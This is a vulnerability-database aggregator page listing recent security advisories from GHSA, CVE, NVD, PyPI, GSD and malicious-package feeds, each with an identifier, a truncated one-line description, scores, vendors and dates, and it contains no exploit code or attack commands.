Recent vulnerabilities


Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ghsa-cxm3-wv7p-598c Malicious versions of Nx were published 2025-08-27T16:42:47Z 2025-09-01T20:11:14Z
ghsa-5jch-xhw4-r43v Google Sign-In for Rails allowed redirect to protocol-relative URI 2025-08-29T20:07:47Z 2025-09-01T20:06:09Z
ghsa-xwfj-jgwm-7wp5 Tracing logging user input may result in poisoning logs with ANSI escape sequences 2025-08-29T20:33:56Z 2025-09-01T20:05:43Z
ghsa-9fvj-xqr2-xwg8 gnark affected by denial of service when computing scalar multiplication using fake-GLV algorithm 2025-08-29T20:20:13Z 2025-09-01T20:05:35Z
ghsa-hw6f-rjfj-j7j7 Eventlet affected by HTTP request smuggling in unparsed trailers 2025-08-29T20:08:24Z 2025-09-01T20:05:28Z
ghsa-4342-x723-ch2f Next.js Improper Middleware Redirect Handling Leads to SSRF 2025-08-29T21:33:09Z 2025-09-01T20:05:22Z
ghsa-g5qg-72qw-gw5v Next.js Affected by Cache Key Confusion for Image Optimization API Routes 2025-08-29T22:06:22Z 2025-09-01T20:05:12Z
ghsa-xv57-4mr9-wg8v Next.js Content Injection Vulnerability for Image Optimization 2025-08-29T21:59:55Z 2025-09-01T20:05:06Z
ghsa-vwmw-mv76-rwfj A security flaw has been discovered in code-projects Human Resource Integrated System 1.0. This imp… 2025-08-31T15:31:31Z 2025-08-31T15:31:31Z
ghsa-v49r-phh2-qv22 A vulnerability was found in itsourcecode Apartment Management System 1.0. The affected element is … 2025-08-31T15:31:31Z 2025-08-31T15:31:31Z
ghsa-qw76-8prh-rg34 A vulnerability was identified in DCMTK up to 3.6.9. This affects an unknown function in the librar… 2025-08-31T15:31:31Z 2025-08-31T15:31:31Z
ghsa-pxmj-3jq4-mpmc A security flaw has been discovered in O2OA up to 10.0-410. The impacted element is an unknown func… 2025-08-31T15:31:31Z 2025-08-31T15:31:31Z
ghsa-mjfw-v74j-p2xx A vulnerability was determined in Tenda AC9 15.03.05.19. The impacted element is an unknown functio… 2025-08-31T15:31:31Z 2025-08-31T15:31:31Z
ghsa-m83m-g37g-fcp4 A vulnerability was detected in PHPGurukul Online Course Registration 3.1. This vulnerability affec… 2025-08-31T15:31:31Z 2025-08-31T15:31:31Z
ghsa-mcmm-333p-x7jv A weakness has been identified in O2OA up to 10.0-410. This vulnerability affects unknown code of t… 2025-08-31T06:30:32Z 2025-08-31T06:30:32Z
ghsa-gm96-82gj-wrpp A vulnerability was identified in O2OA up to 10.0-410. Affected by this issue is some unknown funct… 2025-08-31T06:30:32Z 2025-08-31T06:30:32Z
ghsa-ch38-rrf9-v6gp A vulnerability was determined in O2OA up to 10.0-410. Affected by this vulnerability is an unknown… 2025-08-31T06:30:32Z 2025-08-31T06:30:32Z
ghsa-c43q-8w65-2rpv The Amministrazione Trasparente plugin for WordPress is vulnerable to Stored Cross-Site Scripting v… 2025-08-31T06:30:32Z 2025-08-31T06:30:32Z
ghsa-982p-xx32-2jcp A security flaw has been discovered in O2OA up to 10.0-410. This affects an unknown part of the fil… 2025-08-31T06:30:32Z 2025-08-31T06:30:32Z
ghsa-7w37-3fmj-m88q Missing Authorization vulnerability in Hamid Alinia Login with phone number.This issue affects Logi… 2025-08-31T06:30:32Z 2025-08-31T06:30:32Z
ghsa-7vgp-hcc6-m685 Unrestricted Upload of File with Dangerous Type vulnerability in Mojoomla School Management allows … 2025-08-31T06:30:32Z 2025-08-31T06:30:32Z
ghsa-76mj-9xxw-w7cp Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusi… 2025-08-31T06:30:32Z 2025-08-31T06:30:32Z
ghsa-6v8g-vwwv-97gg Missing Authorization vulnerability in UkrSolution Barcode Scanner with Inventory & Order Manager.T… 2025-08-31T06:30:32Z 2025-08-31T06:30:32Z
ghsa-32vr-5hxf-x93f A flaw was found in libxml2's xmlBuildQName function, where integer overflows in buffer size calcul… 2025-06-12T15:31:22Z 2025-08-31T06:30:32Z
ghsa-xrq2-m5w8-p5wg A flaw exists in gdk‑pixbuf within the gdk_pixbuf__jpeg_image_load_increment function (io-jpeg.c) a… 2025-07-08T15:32:03Z 2025-08-31T00:30:25Z
ghsa-xg88-gpx5-mfr4 A security vulnerability has been detected in SourceCodester Water Billing System 1.0. Affected by … 2025-08-31T00:30:25Z 2025-08-31T00:30:25Z
ghsa-5c47-vqvw-7jp7 Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority. 2025-08-31T00:30:25Z 2025-08-31T00:30:25Z
ghsa-84r7-2grh-mcm2 A weakness has been identified in SourceCodester Water Billing System 1.0. Affected is an unknown f… 2025-08-30T21:30:59Z 2025-08-30T21:30:59Z
ghsa-7cr6-m4p3-3g6j A vulnerability was identified in SourceCodester Simple Cafe Billing System 1.0. This affects an un… 2025-08-30T21:30:59Z 2025-08-30T21:30:59Z
ghsa-6f54-4g95-3m63 A security flaw has been discovered in SourceCodester Water Billing System 1.0. This impacts an unk… 2025-08-30T21:30:59Z 2025-08-30T21:30:59Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2025-9799 Langfuse Webhook promptRouter.ts promptChangeEventSour… n/a
Langfuse
2025-09-01T22:02:09.356Z 2025-09-01T22:02:09.356Z
cve-2025-9797 mrvautin expressCart Edit Product edit injection mrvautin
expressCart
2025-09-01T22:02:06.955Z 2025-09-01T22:02:06.955Z
cve-2025-9796 thinkgem JeeSite EncodeUtils.java decodeUrl2 cross sit… thinkgem
JeeSite
2025-09-01T21:32:08.508Z 2025-09-01T21:32:08.508Z
cve-2024-28988 9.8 (v3.1) SolarWinds Web Help Desk Java Deserialization Remote C… SolarWinds
Web Help Desk
2025-09-01T21:18:58.626Z 2025-09-01T21:18:58.626Z
cve-2025-55621 N/A An Insecure Direct Object Reference (IDOR) vulner… n/a
n/a
2025-08-22T00:00:00.000Z 2025-09-01T21:17:21.838Z
cve-2025-55622 N/A Reolink v4.54.0.4.20250526 was discovered to cont… n/a
n/a
2025-08-22T00:00:00.000Z 2025-09-01T21:12:54.133Z
cve-2025-55625 N/A An open redirect vulnerability in Reolink v4.54.0… n/a
n/a
2025-08-22T00:00:00.000Z 2025-09-01T21:09:47.438Z
cve-2025-55631 N/A Reolink Smart 2K+ Plug-in Wi-Fi Video Doorbell wi… n/a
n/a
2025-08-22T00:00:00.000Z 2025-09-01T21:06:19.051Z
cve-2025-9795 xujeff tianti 天梯 UploadController.java ajaxUploadFile … xujeff
tianti 天梯
2025-09-01T21:02:06.245Z 2025-09-01T21:02:06.245Z
cve-2025-9794 Campcodes Computer Sales and Inventory System pos_tran… Campcodes
Computer Sales and Inventory System
2025-09-01T20:32:07.651Z 2025-09-01T20:32:07.651Z
cve-2025-9793 itsourcecode Apartment Management System Setting admin… itsourcecode
Apartment Management System
2025-09-01T20:02:07.257Z 2025-09-01T20:02:07.257Z
cve-2025-9792 itsourcecode Apartment Management System e_all_info.ph… itsourcecode
Apartment Management System
2025-09-01T19:32:07.130Z 2025-09-01T19:32:07.130Z
cve-2025-9810 6.8 (v3.1) TOCTOU race in Linenoise enables arbitrary file overwr… antirez
linenoise
2025-09-01T19:03:19.540Z 2025-09-01T19:03:19.540Z
cve-2025-9791 Tenda AC20 fromAdvSetMacMtuWan stack-based overflow Tenda
AC20
2025-09-01T19:02:07.802Z 2025-09-01T19:02:07.802Z
cve-2025-9809 8.4 (v4.0) Out-of-bounds write in cdfs_open_cue_track in lib… libretro
libretro-common
2025-09-01T18:38:22.165Z 2025-09-01T18:38:22.165Z
cve-2025-9790 SourceCodester Hotel Reservation System updateabout.ph… SourceCodester
Hotel Reservation System
2025-09-01T18:32:07.275Z 2025-09-01T18:32:07.275Z
cve-2025-3586 7.5 (v4.0) In Liferay Portal 7.4.3.27 through 7.4.3.42, and … Liferay
Portal
2025-09-01T18:07:56.434Z 2025-09-01T18:07:56.434Z
cve-2025-9789 SourceCodester Online Hotel Reservation System edituse… SourceCodester
Online Hotel Reservation System
2025-09-01T18:02:07.145Z 2025-09-01T18:02:07.145Z
cve-2025-9788 SourceCodester/Campcodes School Log Management System … SourceCodester
School Log Management System
2025-09-01T17:32:06.556Z 2025-09-01T17:32:06.556Z
cve-2025-7969 6.9 (v4.0) Markdown-it 14.1.0 - Cross-site scripting (XSS) markdown-it
markdown-it
2025-08-21T16:40:05.915Z 2025-09-01T17:19:53.496Z
cve-2025-9375 6.9 (v4.0) xmltodict 0.14.2 - XML Injection xmltodict
xmltodict
2025-09-01T16:43:18.220Z 2025-09-01T16:43:18.220Z
cve-2025-57799 StreamVault can perform remote command execution lemon8866
StreamVault
2025-09-01T15:46:27.137Z 2025-09-01T15:46:27.137Z
cve-2025-55007 Knowage vulnerable to server-side request forgery KnowageLabs
Knowage-Server
2025-09-01T15:46:04.915Z 2025-09-01T15:46:04.915Z
cve-2024-5971 7.5 (v3.1) Undertow: response write hangs in case of java 17 tlsv…

2024-07-08T20:51:29.223Z 2025-09-01T15:32:48.332Z
cve-2025-9786 Campcodes Online Learning Management System teacher_si… Campcodes
Online Learning Management System
2025-09-01T15:32:07.126Z 2025-09-01T15:32:07.126Z
cve-2025-9688 Mupen64Plus is_viewer.c write_is_viewer integer overflow n/a
Mupen64Plus
2025-08-30T12:32:07.104Z 2025-09-01T15:02:41.844Z
cve-2025-9783 TOTOLINK A702R formParentControl sub_418030 buffer overflow TOTOLINK
A702R
2025-09-01T14:32:07.404Z 2025-09-01T14:32:07.404Z
cve-2025-0656 6.1 (v3.1) IBM Concert Software cross-site scripting IBM
Concert Software
2025-09-01T14:23:54.041Z 2025-09-01T14:23:54.041Z
cve-2025-33082 5.4 (v3.1) IBM Concert Software cross-site scripting IBM
Concert Software
2025-09-01T14:22:55.516Z 2025-09-01T14:22:55.516Z
cve-2025-33083 5.4 (v3.1) IBM Concert Software cross-site scripting IBM
Concert Software
2025-09-01T14:22:14.739Z 2025-09-01T14:22:14.739Z
Vulnerabilities are sorted by update time (recent to old).
ID CVSS Description Vendor Product Published Updated
cve-2025-9799 Langfuse Webhook promptRouter.ts promptChangeEventSour… n/a
Langfuse
2025-09-01T22:02:09.356Z 2025-09-01T22:02:09.356Z
cve-2025-9797 mrvautin expressCart Edit Product edit injection mrvautin
expressCart
2025-09-01T22:02:06.955Z 2025-09-01T22:02:06.955Z
cve-2025-9796 thinkgem JeeSite EncodeUtils.java decodeUrl2 cross sit… thinkgem
JeeSite
2025-09-01T21:32:08.508Z 2025-09-01T21:32:08.508Z
cve-2025-55622 N/A Reolink v4.54.0.4.20250526 was discovered to cont… n/a
n/a
2025-08-22T00:00:00.000Z 2025-09-01T21:12:54.133Z
cve-2025-55621 N/A An Insecure Direct Object Reference (IDOR) vulner… n/a
n/a
2025-08-22T00:00:00.000Z 2025-09-01T21:17:21.838Z
cve-2024-28988 9.8 (v3.1) SolarWinds Web Help Desk Java Deserialization Remote C… SolarWinds
Web Help Desk
2025-09-01T21:18:58.626Z 2025-09-01T21:18:58.626Z
cve-2025-9795 xujeff tianti 天梯 UploadController.java ajaxUploadFile … xujeff
tianti 天梯
2025-09-01T21:02:06.245Z 2025-09-01T21:02:06.245Z
cve-2025-9794 Campcodes Computer Sales and Inventory System pos_tran… Campcodes
Computer Sales and Inventory System
2025-09-01T20:32:07.651Z 2025-09-01T20:32:07.651Z
cve-2025-55631 N/A Reolink Smart 2K+ Plug-in Wi-Fi Video Doorbell wi… n/a
n/a
2025-08-22T00:00:00.000Z 2025-09-01T21:06:19.051Z
cve-2025-55625 N/A An open redirect vulnerability in Reolink v4.54.0… n/a
n/a
2025-08-22T00:00:00.000Z 2025-09-01T21:09:47.438Z
cve-2025-9793 itsourcecode Apartment Management System Setting admin… itsourcecode
Apartment Management System
2025-09-01T20:02:07.257Z 2025-09-01T20:02:07.257Z
cve-2025-9792 itsourcecode Apartment Management System e_all_info.ph… itsourcecode
Apartment Management System
2025-09-01T19:32:07.130Z 2025-09-01T19:32:07.130Z
cve-2025-9810 6.8 (v3.1) TOCTOU race in Linenoise enables arbitrary file overwr… antirez
linenoise
2025-09-01T19:03:19.540Z 2025-09-01T19:03:19.540Z
cve-2025-9809 8.4 (v4.0) Out-of-bounds write in cdfs_open_cue_track in lib… libretro
libretro-common
2025-09-01T18:38:22.165Z 2025-09-01T18:38:22.165Z
cve-2025-9791 Tenda AC20 fromAdvSetMacMtuWan stack-based overflow Tenda
AC20
2025-09-01T19:02:07.802Z 2025-09-01T19:02:07.802Z
cve-2025-9790 SourceCodester Hotel Reservation System updateabout.ph… SourceCodester
Hotel Reservation System
2025-09-01T18:32:07.275Z 2025-09-01T18:32:07.275Z
cve-2025-9789 SourceCodester Online Hotel Reservation System edituse… SourceCodester
Online Hotel Reservation System
2025-09-01T18:02:07.145Z 2025-09-01T18:02:07.145Z
cve-2025-9788 SourceCodester/Campcodes School Log Management System … SourceCodester
School Log Management System
2025-09-01T17:32:06.556Z 2025-09-01T17:32:06.556Z
cve-2025-7969 6.9 (v4.0) Markdown-it 14.1.0 - Cross-site scripting (XSS) markdown-it
markdown-it
2025-08-21T16:40:05.915Z 2025-09-01T17:19:53.496Z
cve-2025-3586 7.5 (v4.0) In Liferay Portal 7.4.3.27 through 7.4.3.42, and … Liferay
Portal
2025-09-01T18:07:56.434Z 2025-09-01T18:07:56.434Z
cve-2025-9375 6.9 (v4.0) xmltodict 0.14.2 - XML Injection xmltodict
xmltodict
2025-09-01T16:43:18.220Z 2025-09-01T16:43:18.220Z
cve-2025-9786 Campcodes Online Learning Management System teacher_si… Campcodes
Online Learning Management System
2025-09-01T15:32:07.126Z 2025-09-01T15:32:07.126Z
cve-2025-57799 StreamVault can perform remote command execution lemon8866
StreamVault
2025-09-01T15:46:27.137Z 2025-09-01T15:46:27.137Z
cve-2025-55007 Knowage vulnerable to server-side request forgery KnowageLabs
Knowage-Server
2025-09-01T15:46:04.915Z 2025-09-01T15:46:04.915Z
cve-2025-9783 TOTOLINK A702R formParentControl sub_418030 buffer overflow TOTOLINK
A702R
2025-09-01T14:32:07.404Z 2025-09-01T14:32:07.404Z
cve-2025-9688 Mupen64Plus is_viewer.c write_is_viewer integer overflow n/a
Mupen64Plus
2025-08-30T12:32:07.104Z 2025-09-01T15:02:41.844Z
cve-2025-33102 5.9 (v3.1) IBM Concert Software information disclosure IBM
Concert Software
2025-09-01T14:18:37.636Z 2025-09-01T14:18:37.636Z
cve-2025-33099 5.9 (v3.1) IBM Concert Software information disclosure IBM
Concert Software
2025-09-01T14:19:45.777Z 2025-09-01T14:19:45.777Z
cve-2025-33084 5.9 (v3.1) IBM Concert Software information disclosure IBM
Concert Software
2025-09-01T14:20:52.366Z 2025-09-01T14:20:52.366Z
cve-2025-33083 5.4 (v3.1) IBM Concert Software cross-site scripting IBM
Concert Software
2025-09-01T14:22:14.739Z 2025-09-01T14:22:14.739Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
fkie_cve-2025-9795 A vulnerability has been found in xujeff tianti 天梯 up to 2.3. The impacted element is the function … 2025-09-01T21:15:29.607 2025-09-01T21:15:29.607
fkie_cve-2025-9794 A flaw has been found in Campcodes Computer Sales and Inventory System 1.0. The affected element is… 2025-09-01T21:15:29.330 2025-09-01T21:15:29.330
fkie_cve-2025-55631 Reolink Smart 2K+ Plug-in Wi-Fi Video Doorbell with Chime - firmware v3.0.0.4662_2503122283 was dis… 2025-08-22T17:15:35.017 2025-09-01T21:15:29.130
fkie_cve-2025-55625 An open redirect vulnerability in Reolink v4.54.0.4.20250526 allows attackers to redirect users to … 2025-08-22T17:15:34.250 2025-09-01T21:15:28.223
fkie_cve-2025-9793 A vulnerability was detected in itsourcecode Apartment Management System 1.0. Impacted is an unknow… 2025-09-01T20:15:30.967 2025-09-01T20:15:30.967
fkie_cve-2025-9792 A security vulnerability has been detected in itsourcecode Apartment Management System 1.0. This is… 2025-09-01T20:15:30.717 2025-09-01T20:15:30.717
fkie_cve-2025-9810 TOCTOU  in linenoiseHistorySave in linenoise allows local attackers to overwrite arbitrary files an… 2025-09-01T19:15:32.573 2025-09-01T19:15:32.573
fkie_cve-2025-9809 Out-of-bounds write in cdfs_open_cue_track in libretro libretro-common latest on all platforms allo… 2025-09-01T19:15:32.383 2025-09-01T19:15:32.383
fkie_cve-2025-9791 A weakness has been identified in Tenda AC20 16.03.08.05. This vulnerability affects unknown code o… 2025-09-01T19:15:32.160 2025-09-01T19:15:32.160
fkie_cve-2025-9790 A security flaw has been discovered in SourceCodester Hotel Reservation System 1.0. This affects an… 2025-09-01T19:15:31.273 2025-09-01T19:15:31.273
fkie_cve-2025-9789 A vulnerability was identified in SourceCodester Online Hotel Reservation System 1.0. Affected by t… 2025-09-01T18:15:29.743 2025-09-01T18:15:29.743
fkie_cve-2025-9788 A vulnerability was determined in SourceCodester/Campcodes School Log Management System 1.0. Affect… 2025-09-01T18:15:29.523 2025-09-01T18:15:29.523
fkie_cve-2025-7969 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnera… 2025-08-21T17:15:32.893 2025-09-01T18:15:29.333
fkie_cve-2025-3586 In Liferay Portal 7.4.3.27 through 7.4.3.42, and Liferay DXP 2024.Q1.1 through 2024.Q1.20, 2023.Q4.… 2025-09-01T18:15:29.127 2025-09-01T18:15:29.127
fkie_cve-2025-9375 XML Injection vulnerability in xmltodict allows Input Data Manipulation.This issue affects xmltodic… 2025-09-01T17:15:33.063 2025-09-01T17:15:33.063
fkie_cve-2025-9786 A vulnerability was found in Campcodes Online Learning Management System 1.0. Affected is an unknow… 2025-09-01T16:15:31.780 2025-09-01T16:15:31.780
fkie_cve-2025-57799 StreamVault is a multi-platform video parsing and downloading tool. Prior to version 250822, after … 2025-09-01T16:15:31.590 2025-09-01T16:15:31.590
fkie_cve-2025-55007 Knowage is an open source analytics and business intelligence suite. Prior to version 8.1.37, Knowa… 2025-09-01T16:15:31.370 2025-09-01T16:15:31.370
fkie_cve-2025-9783 A vulnerability was determined in TOTOLINK A702R 4.0.0-B20211108.1423. This issue affects the funct… 2025-09-01T15:15:35.650 2025-09-01T15:15:35.650
fkie_cve-2025-9688 A security vulnerability has been detected in Mupen64Plus up to 2.6.0. The affected element is the … 2025-08-30T13:15:34.397 2025-09-01T15:15:35.437
fkie_cve-2025-33102 IBM Concert Software 1.0.0 through 1.1.0 uses weaker than expected cryptographic algorithms that co… 2025-09-01T15:15:35.230 2025-09-01T15:15:35.230
fkie_cve-2025-33099 IBM Concert Software 1.0.0 through 1.1.0 could allow a remote attacker to perform unauthorized acti… 2025-09-01T15:15:35.030 2025-09-01T15:15:35.030
fkie_cve-2025-33084 IBM Concert Software 1.0.0 through 1.1.0 could allow a remote attacker to obtain sensitive informat… 2025-09-01T15:15:34.833 2025-09-01T15:15:34.833
fkie_cve-2025-33083 IBM Concert Software 1.0.0 through 1.1.0 is vulnerable to cross-site scripting. This vulnerability … 2025-09-01T15:15:34.640 2025-09-01T15:15:34.640
fkie_cve-2025-33082 IBM Concert Software 1.0.0 through 1.1.0 is vulnerable to cross-site scripting. This vulnerability … 2025-09-01T15:15:34.440 2025-09-01T15:15:34.440
fkie_cve-2025-0656 IBM Concert Software 1.0.0 through 1.1.0 is vulnerable to cross-site scripting. This vulnerability … 2025-09-01T15:15:33.593 2025-09-01T15:15:33.593
fkie_cve-2025-9782 A vulnerability was found in TOTOLINK A702R 4.0.0-B20211108.1423. This vulnerability affects the fu… 2025-09-01T14:15:32.003 2025-09-01T14:15:32.003
fkie_cve-2025-9781 A vulnerability has been found in TOTOLINK A702R 4.0.0-B20211108.1423. This affects the function su… 2025-09-01T14:15:31.723 2025-09-01T14:15:31.723
fkie_cve-2025-9780 A flaw has been found in TOTOLINK A702R 4.0.0-B20211108.1423. Affected by this issue is the functio… 2025-09-01T13:15:33.987 2025-09-01T13:15:33.987
fkie_cve-2025-9779 A vulnerability was detected in TOTOLINK A702R 4.0.0-B20211108.1423. Affected by this vulnerability… 2025-09-01T13:15:33.730 2025-09-01T13:15:33.730
Vulnerabilities are sorted by update time (recent to old).
ID Description Package Published Updated
pysec-2024-85 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-08-28T12:25:29.793519Z
pysec-2024-84 Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-08-28T12:25:29.703832Z
pysec-2024-83 Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsD… mindsdb 2024-09-12T13:15:00Z 2025-08-28T12:25:29.612094Z
pysec-2024-82 Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB… mindsdb 2024-09-12T13:15:00Z 2025-08-28T12:25:29.518395Z
pysec-2023-278 MindsDB connects artificial intelligence models to real time data. Versions prior to 23.1… mindsdb 2023-12-11T21:15:00Z 2025-08-28T12:25:29.404176Z
pysec-2025-52 gateway_proxy_handler in MLflow before 3.1.0 lacks gateway_path validation. mlflow 2025-06-23T15:15:29Z 2025-08-28T06:24:53.410404Z
pysec-2025-72 The `num2words` project was compromised via a phishing attack and two new versions were u… num2words 2025-07-31T14:34:47+00:00
pysec-2025-71 Cadwyn creates production-ready community-driven modern Stripe-like API versioning in Fas… cadwyn 2025-07-21T21:15:25+00:00 2025-07-23T15:24:03.825615+00:00
pysec-2025-70 A Server-Side Request Forgery (SSRF) vulnerability exists in the RequestsToolkit componen… langchain-community 2025-06-23T21:15:25+00:00 2025-07-16T21:23:40.211079+00:00
pysec-2024-259 In PyTorch <=2.4.1, the RemoteModule has Deserialization RCE. NOTE: this is disputed by m… torch 2024-10-29T21:15:04+00:00 2025-07-16T03:09:57.748865+00:00
pysec-2024-258 In scrapy/scrapy, an issue was identified where the Authorization header is not removed d… scrapy 2024-05-20T08:15:08+00:00 2025-07-15T17:37:50.051730+00:00
pysec-2025-69 In Roundup before 2.5.0, XSS can occur via interaction between URLs and issue tracker tem… roundup 2025-07-13T20:15:25+00:00 2025-07-13T21:23:01.161315+00:00
pysec-2025-68 A vulnerability, which was classified as critical, has been found in Upsonic up to 0.55.6… upsonic 2025-06-19T21:15:27+00:00 2025-07-08T19:22:27.449399+00:00
pysec-2025-67 A vulnerability classified as critical was found in Upsonic up to 0.55.6. This vulnerabil… upsonic 2025-06-19T21:15:27+00:00 2025-07-08T19:22:27.385619+00:00
pysec-2025-66 Improper privilege management in a REST interface allowed registered users to access unau… streampipes 2025-03-03T11:15:11+00:00 2025-07-08T15:23:46.628375+00:00
pysec-2025-65 A path traversal vulnerability exists in run-llama/llama_index versions 0.12.27 through 0… llama-index 2025-07-07T13:15:28+00:00 2025-07-07T15:23:42.730681+00:00
pysec-2025-61 Pillow is a Python imaging library. In versions 11.2.0 to before 11.3.0, there is a heap … pillow 2025-07-01T19:15:27Z 2025-07-07T14:12:46.226030Z
pysec-2025-64 A vulnerability classified as critical has been found in themanojdesai python-a2a up to 0… python-a2a 2025-06-17T07:15:18+00:00 2025-07-02T21:23:13.806273+00:00
pysec-2025-63 vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Whe… vllm 2025-03-19T16:15:32+00:00 2025-07-01T23:22:49.176005+00:00
pysec-2025-62 vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Mal… vllm 2025-02-07T20:15:34+00:00 2025-07-01T23:22:49.083695+00:00
pysec-2025-60 Exposure of Sensitive Information to an Unauthorized Actor, Insertion of Sensitive Inform… apache-iotdb 2025-05-14T11:16:28+00:00 2025-07-01T21:22:47.232036+00:00
pysec-2025-59 Remote Code Execution with untrusted URI of UDF vulnerability in Apache IoTDB. The attack… apache-iotdb 2025-05-14T11:15:47+00:00 2025-07-01T21:22:47.177405+00:00
pysec-2024-257 Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessm… mobsf 2024-03-22T23:15:07+00:00 2025-06-30T15:23:50.085549+00:00
pysec-2025-58 vLLM is a library for LLM inference and serving. vllm/model_executor/weight_utils.py impl… vllm 2025-01-27T18:15:41+00:00 2025-06-27T21:22:36.583615+00:00
pysec-2025-57 A Denial of Service (DoS) vulnerability in zenml-io/zenml version 0.66.0 allows unauthent… zenml 2025-03-20T10:15:48+00:00 2025-06-27T17:22:55.175431+00:00
pysec-2025-56 OctoPrint provides a web interface for controlling consumer 3D printers. In versions up t… octoprint 2025-04-22T18:15:59+00:00 2025-06-27T17:22:53.513680+00:00
pysec-2024-256 Mobile Security Framework (MobSF) is a pen-testing, malware analysis and security assessm… mobsf 2024-12-03T16:15:24+00:00 2025-06-27T17:22:53.325430+00:00
pysec-2025-55 vLLM is an inference and serving engine for large language models (LLMs). Version 0.8.0 u… vllm 2025-05-30T19:15:30+00:00 2025-06-26T21:23:06.407481+00:00
pysec-2025-54 vLLM is an inference and serving engine for large language models (LLMs). In versions 0.8… vllm 2025-05-30T19:15:30+00:00 2025-06-26T21:23:06.319321+00:00
pysec-2025-53 vLLM is an inference and serving engine for large language models (LLMs). Prior to versio… vllm 2025-05-29T17:15:21+00:00 2025-06-26T21:23:06.231251+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
gsd-2024-33884 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33901 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33887 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33895 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33894 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33902 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33888 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33885 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33891 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33899 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33889 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33893 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33892 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33890 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33896 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33903 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33900 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33898 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33886 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33897 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33883 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4303 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4300 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4297 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4301 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4296 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4299 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4302 The format of the source doesn't require a description, click on the link for more details
gsd-2024-4298 The format of the source doesn't require a description, click on the link for more details
gsd-2024-33876 The format of the source doesn't require a description, click on the link for more details
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
mal-2024-11205 Malicious code in @wix-platform/velo-multilingual-helper-backend (npm) 2024-12-05T12:37:46Z 2024-12-05T12:37:46Z
mal-2024-11204 Malicious code in cdp-agentkit-core (npm) 2024-12-05T10:35:51Z 2024-12-05T10:35:51Z
mal-2024-7895 Malicious code in lit-3 (npm) 2024-08-05T18:53:26Z 2024-12-05T09:06:36Z
mal-2024-11203 Malicious code in finn-pulse-init (npm) 2024-12-05T07:58:04Z 2024-12-05T08:07:42Z
mal-2024-11202 Malicious code in buoyant-utils (npm) 2024-12-05T05:57:35Z 2024-12-05T05:57:35Z
mal-2024-11201 Malicious code in coldbox (npm) 2024-12-05T04:54:20Z 2024-12-05T05:06:49Z
mal-2024-11200 Malicious code in quintoandar-jwt (npm) 2024-12-05T00:55:28Z 2024-12-05T00:55:28Z
mal-2024-10914 Malicious code in veworld-mock (npm) 2024-11-24T20:43:19Z 2024-12-05T00:35:15Z
mal-2024-10912 Malicious code in quorumnetworktester (npm) 2024-11-24T18:53:52Z 2024-12-05T00:35:15Z
mal-2024-10911 Malicious code in plaid-tiny-quickstart (npm) 2024-11-24T16:15:48Z 2024-12-05T00:35:15Z
mal-2024-10572 Malicious code in xcasset-gen (npm) 2024-11-08T12:05:36Z 2024-12-05T00:35:15Z
mal-2024-10570 Malicious code in spliffy-benchmark (npm) 2024-11-08T13:58:58Z 2024-12-05T00:35:15Z
mal-2024-10569 Malicious code in quill-icons-park (npm) 2024-11-08T12:25:57Z 2024-12-05T00:35:15Z
mal-2024-10566 Malicious code in pixiv-novel-editor (npm) 2024-11-08T12:13:43Z 2024-12-05T00:35:15Z
mal-2024-10534 Malicious code in sinbad-dev (npm) 2024-11-08T11:45:22Z 2024-12-05T00:35:15Z
mal-2024-2055 Malicious code in d11-foo (npm) 2024-06-25T12:35:11Z 2024-12-05T00:35:14Z
mal-2024-11183 Malicious code in @solana/web3.js (npm) 2024-12-03T22:45:37Z 2024-12-05T00:35:14Z
mal-2024-10909 Malicious code in lunar-root (npm) 2024-11-24T23:02:20Z 2024-12-05T00:35:14Z
mal-2024-10908 Malicious code in jigasi-haproxy-agent (npm) 2024-11-24T18:18:29Z 2024-12-05T00:35:14Z
mal-2024-10907 Malicious code in generate-release-description (npm) 2024-11-24T22:43:11Z 2024-12-05T00:35:14Z
mal-2024-10906 Malicious code in eth-based-p2p-e2e-latency (npm) 2024-11-24T20:26:35Z 2024-12-05T00:35:14Z
mal-2024-10905 Malicious code in dashlane-vscode (npm) 2024-11-24T15:55:46Z 2024-12-05T00:35:14Z
mal-2024-10904 Malicious code in d1-northwind (npm) 2024-11-24T22:07:48Z 2024-12-05T00:35:14Z
